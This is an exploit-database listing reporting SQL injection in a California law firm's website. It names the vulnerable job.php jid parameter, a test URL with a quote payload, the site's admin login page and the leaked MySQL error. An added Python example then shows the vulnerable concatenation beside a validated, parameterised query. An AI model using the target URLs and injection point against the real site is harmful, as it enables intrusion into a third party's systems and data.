Fagen Friedman & Fulfrost LLP SQLi - CXSecurity.com

Vulnerability ID 1736114 Vulnerability type
Published 2019-09-10 Updated 2019-09-10
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019090080
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
# Exploit Title: Fagen Friedman & Fulfrost LLP SQLi
# Date: 10 Sep 2019
# Author: H.BBF3.4 & A.BBF3.4
+++++++++++++++++++++++++

ABOUT Fagen Friedman & Fulfrost:
Fagen Friedman & Fulfrost’s attorneys are leaders in their fields and diverse in experience, education and interests. Our firm offers comprehensive legal services to school districts, county offices of education, Special Education Local Plan Areas, and community colleges.
Fagen Friedman & Fulfrost LLP "F3" represents nearly 400 of California's educational institutions and related agencies. These institutions include school districts, community college districts, SELPAs, county offices of education and public agencies.

++++++++++++++++++++++++++

# SQL Injection Exploit :
**********************
job.php?jid=


# Example Vulnerable Sites :
*************************
[+] https://www.f3law.com/job.php?jid=9%27

admin login:
https://www.f3law.com/admin/

# Example SQL Database Error :
****************************
ERROR: Select Sidebars
MySQL said: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND s.active = 'Y' ORDER BY sort_order' at line 4
Query: SELECT * FROM sidebars s INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = 9' AND s.active = 'Y' ORDER BY sort_order;
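
The error output above shows the `jid` value landing unquoted in `WHERE sp.idjob_post = ...` and the full query being echoed back to the visitor. As an added example (not code from the advisory or from the site, whose source is not shown), the following contrasts string-built SQL with an integer check plus a bound parameter, and returns a generic error instead of the database message. It uses Python's `sqlite3` with a constructed schema as a stand-in for the site's PHP/MySQL stack; the `title` column, the sample rows and all function names are assumptions.

```python
import sqlite3

# Query shape taken from the error output above; {} marks where jid lands.
# The selected `title` column is an assumption (the page's query uses SELECT *).
QUERY = ("SELECT s.title FROM sidebars s "
         "INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id "
         "WHERE sp.idjob_post = {} AND s.active = 'Y' ORDER BY sort_order")

def make_db():
    """Constructed sample schema and rows, not the site's real data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sidebars (sidebar_id INTEGER, title TEXT,
                               active TEXT, sort_order INTEGER);
        CREATE TABLE sidebars_jobs (sidebar_id INTEGER, idjob_post INTEGER);
        INSERT INTO sidebars VALUES (1, 'Benefits', 'Y', 2),
                                    (2, 'Apply', 'Y', 1),
                                    (3, 'Old', 'N', 3);
        INSERT INTO sidebars_jobs VALUES (1, 9), (2, 9), (3, 9);
    """)
    return db

def sidebars_concat(db, jid):
    """Vulnerable pattern: the request value is pasted into the SQL text."""
    return [row[0] for row in db.execute(QUERY.format(jid))]

def sidebars_bound(db, jid):
    """Hardened: accept only a short ASCII digit string, then bind it."""
    if not (isinstance(jid, str) and jid.isascii()
            and jid.isdigit() and len(jid) <= 10):
        raise ValueError("invalid job id")
    return [row[0] for row in db.execute(QUERY.format("?"), (int(jid),))]

def handle_request(db, jid):
    """Return (status, body); database errors are never echoed to the client."""
    try:
        return 200, sidebars_bound(db, jid)
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error:
        # Log the exception server-side here; the client gets no query text.
        return 500, "Internal error"
```
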